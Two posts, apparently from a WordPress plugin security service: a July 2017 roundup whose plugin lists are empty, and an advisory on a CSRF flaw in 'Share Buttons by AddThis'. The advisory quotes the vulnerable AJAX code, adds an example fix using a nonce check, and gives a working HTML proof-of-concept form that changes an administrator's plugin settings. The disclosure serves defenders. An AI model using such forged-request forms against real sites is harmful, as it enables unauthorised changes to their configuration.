01 Aug

What Happened With WordPress Plugin Vulnerabilities in July 2017

If you want the best information, and therefore the best protection, against vulnerabilities in WordPress plugins, our service provides it.

Here is what we did during July to keep those who are already using our service secure from WordPress plugin vulnerabilities (and what you have been missing out on if you haven’t signed up yet):

Plugin Security Reviews

Customers of the service can suggest and vote on plugins to have a security review done by us. This month we released details for a review of:

Plugin Vulnerabilities We Discovered and Publicly Disclosed This Month

We don’t just collect data on vulnerabilities in plugins that others have discovered; we also discover vulnerabilities while monitoring hackers’ activity, reviewing other vulnerabilities, and doing additional checking on the security of plugins.

This month the most concerning vulnerability is a PHP object injection vulnerability in Product Reviews, since that type of vulnerability is likely to be exploited and the vulnerability hasn’t been fixed yet.

Plugin Vulnerabilities We Helped Get Fixed This Month

Letting you know that you are using a vulnerable version of a plugin is useful, but it is much more useful if you can fully protect yourself by simply updating to a new version. So we work with plugin developers to make sure that vulnerabilities get fixed. This month we helped to get vulnerabilities fixed in plugins that have 702,300+ active installs:

Plugin Vulnerabilities Added This Month That Are In The Current Version of the Plugins

Keeping your plugins up to date isn’t enough to keep you secure, as these vulnerabilities in the current versions of plugins show:

Additional Vulnerabilities Added This Month

As usual, there were plenty of other vulnerabilities that we added to our data during the month. Most of the new vulnerabilities that were fixed this month are relatively minor.

19 Jul

Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Share Buttons by AddThis

We recently found that the plugin Share Buttons by AddThis had a cross-site request forgery (CSRF)/settings change vulnerability. When the plugin’s settings are saved by clicking the Save Options button on the plugin’s settings page, proper protection against CSRF exists, but it doesn’t exist for an alternate method used when the plugin is set to be controlled from “AddThis.com”.

When it is controlled that way the addthisAsyncLoading function is accessible through WordPress’ AJAX functionality (in the file /addthis-for-wordpress.php):

add_action( 'wp_ajax_at_async_loading', array($this, 'addthisAsyncLoading'));

That function checks to make sure the request is coming from someone with the “manage_options” capability (which is normally only Administrators), but doesn’t check for a valid nonce to prevent CSRF before updating the plugin’s settings:

public function addthisAsyncLoading()
{
	if (current_user_can( 'manage_options' ) && $this->_checkAsyncLoading()) {
		$updateResult = $this->updateSettings($this->_postVariables);
		// ... remainder of the function not shown

After we notified the developer of the issue they resolved it in version 5.3.6 by removing the code shown above from the plugin.
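For comparison, here is how a handler of this shape looks once a nonce check is placed in front of the settings update. This is an added example, not the plugin’s code or the developer’s fix; the function names, the option name `my_addthis_settings`, the nonce action `my_async_loading` and the request field `security` are all assumptions.

```php
<?php
// Added example (not from the AddThis plugin): the same kind of admin-ajax handler,
// but with a nonce check in front of the capability check and the settings update.
// All names below (my_*, 'my_async_loading', 'security') are assumed for illustration.

// 1. Mint a nonce for the admin page that drives the AJAX call. The value only
//    reaches a page rendered for the logged-in user; a cross-site form cannot read it.
function my_enqueue_async_loading_script() {
    wp_enqueue_script( 'my-async-loading', plugins_url( 'async-loading.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'my-async-loading', 'myAsyncLoading', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'my_async_loading' ), // sent back as the 'security' field
    ) );
}
add_action( 'admin_enqueue_scripts', 'my_enqueue_async_loading_script' );

// 2. Persist the settings. Assumed helper; merges into a single option row.
function my_update_settings( array $settings ) {
    $current = (array) get_option( 'my_addthis_settings', array() );
    return update_option( 'my_addthis_settings', array_merge( $current, $settings ) );
}

// 3. The AJAX handler. A capability check alone does not stop CSRF, because the
//    victim's browser attaches the admin cookies to a forged POST automatically.
//    check_ajax_referer() terminates the request when the 'security' field is
//    missing or does not verify for the 'my_async_loading' action and current user.
function my_async_loading_handler() {
    check_ajax_referer( 'my_async_loading', 'security' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $raw      = isset( $_POST['addthis_settings'] ) && is_array( $_POST['addthis_settings'] )
        ? wp_unslash( $_POST['addthis_settings'] )
        : array();
    $settings = array_map( 'sanitize_text_field', $raw );

    wp_send_json_success( array( 'updated' => my_update_settings( $settings ) ) );
}
add_action( 'wp_ajax_at_async_loading', 'my_async_loading_handler' );
```

With this in place, the form shown in the proof of concept below is rejected before any setting is touched, because it carries no `security` field.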

Proof of Concept

The following proof of concept will cause the AddThis Profile ID setting to be changed to “test”, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="at_async_loading" />
<input type="hidden" name="async_loading" />
<input type="hidden" name="addthis_settings[addthis_profile]" value='test' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 26, 2017 – Developer notified.
  • June 26, 2017 – Developer responds.
  • July 13, 2017 – Version 5.3.6 released, which fixes vulnerability.